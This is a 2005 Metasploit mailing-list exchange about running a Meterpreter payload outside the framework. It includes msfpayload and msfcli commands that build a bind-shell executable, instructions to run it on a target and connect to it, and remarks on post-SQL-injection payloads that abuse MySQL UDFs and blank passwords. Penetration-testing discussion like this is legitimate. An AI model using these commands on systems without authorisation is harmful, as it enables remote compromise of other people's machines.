Metasploit mailing list archives
using Meterpreter , out of MSF
From: elite_netbios at yahoo.com (Hamid . K)
Date: Wed, 26 Oct 2005 03:03:33 -0700 (PDT)
Hi

Thank you both for answers, but I guess something is wrong here with me, or the method HDM mentioned:

$ ./msfpayload win32_bind_meterpreter LPORT=4321 X
Warning: Multistage payloads only return first stage ...

As meterpreter is a staged one, I guess this error is the reason of my failed test :)
After running the generated executable file, no port is opened, nor can the meterpreter client connect to the box.
I'll keep trying ...

regards
Hamid.

--- H D Moore <hdm at metasploit.com> wrote:
> On Tuesday 25 October 2005 19:07, Hamid . K wrote:
> > I was curious, if anyone tried to load meterpreter library, out of framework?
>
> The easy way:
>
> $ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe
>
> Copy this executable to the target system and find some way to execute it. After executing it, you can use the "payload_handler" exploit to connect and interact with it:
>
> $ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \
>     RHOST=<target_system> E
>
> Alternatively, you can use the source code in ./src and just build your own client/server implementation using it.
>
> > Second; is the idea of adding an automated sql-injection module to MSF.
>
> The problem there is that version 2.x is exploit-driven - if you can't use one of the standard payloads or accomplish a very specific task, then it means writing a whole library around post-sql-injection remote compromise. Adding a mysql module means creating payloads for uploading files or executing commands via the mysql stored procedures (load data infile, the UDF stuff that abuses blank passwords, etc). If someone came up with some plausible/useful payloads that would work with generic SQL injection, I would definitely be interested in integrating it. Version 3.x is going to include "recon" modules, so a generic table enumeration module would fit into it much better than 2.x.
>
> -HD